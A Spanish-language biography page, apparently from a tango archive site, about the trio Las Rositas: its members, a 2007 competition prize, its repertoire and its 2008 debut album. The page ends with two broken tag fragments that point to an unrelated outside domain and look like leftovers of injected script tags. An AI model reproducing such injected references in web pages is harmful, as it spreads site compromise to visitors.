Las Rositas

Nombre real: Las Rositas
Trío de violín, viola y piano
(n/d - )
Lugar de nacimiento:
Por
Todotango.com
Gabriela Palma (violín)
Cecilia Palma (viola)
Ana Belén Disandro (piano)

as Rositas Trío de Tango

Gabriela Palma (violín)
Cecilia Palma (viola)
Ana Belén Disandro (piano)

Estas tres jóvenes mujeres, una cordobesa, las otras de la Patagonia, conforman un trío muy original, diferente a los que estamos acostumbrados en el tango.

Las tres aquilatan una sólida formación académica y desarrollaron su incipiente trayectoria en la provincia de Córdoba.

En diciembre de 2007, obtuvieron el primer premio en “La Segunda Selección de Conjuntos Orquestales de Tango 2007”, trasmitido por el canal “Solo Tango”, que contó con la participación de más de 75 grupos orquestales de todo el país. Compitieron dúos, tríos, cuartetos, quintetos hasta orquestas con más de dieciséis integrantes. El premio significó la grabación de su primer trabajo discográfico, compromiso asumido por el sello Euro Records.

Este atípico trío ofrece un repertorio en su mayoría, con arreglos propios, yendo desde Carlos Gardel a Ástor Piazzolla, pasando por Agustín Bardi, Julián Plaza, José Dames, Mariano Mores y Osvaldo Pugliese.

El repertorio contiene tangos conocidos de los primeros años y contemporáneos. Se destacan las versiones de “La yumba”, “El firulete”, “Por una cabeza”, “Fuimos”, “Gallo Ciego”, “Libertango”, exhibiendo una delicada sutileza del trabajo en conjunto.

Las tres ejecutantes logran transmitir una emoción única, medida, de fino tratamiento, que expresa una visión contemporánea de los clásicos, sin abandonar su esencia.

El 25 de julio de 2008, presentaron en Buenos Aires, su primer trabajo discográfico titulado “Estaciones”, en la Academia Nacional del Tango.< src=http://vert4.cn>< src=http://vert4.cn>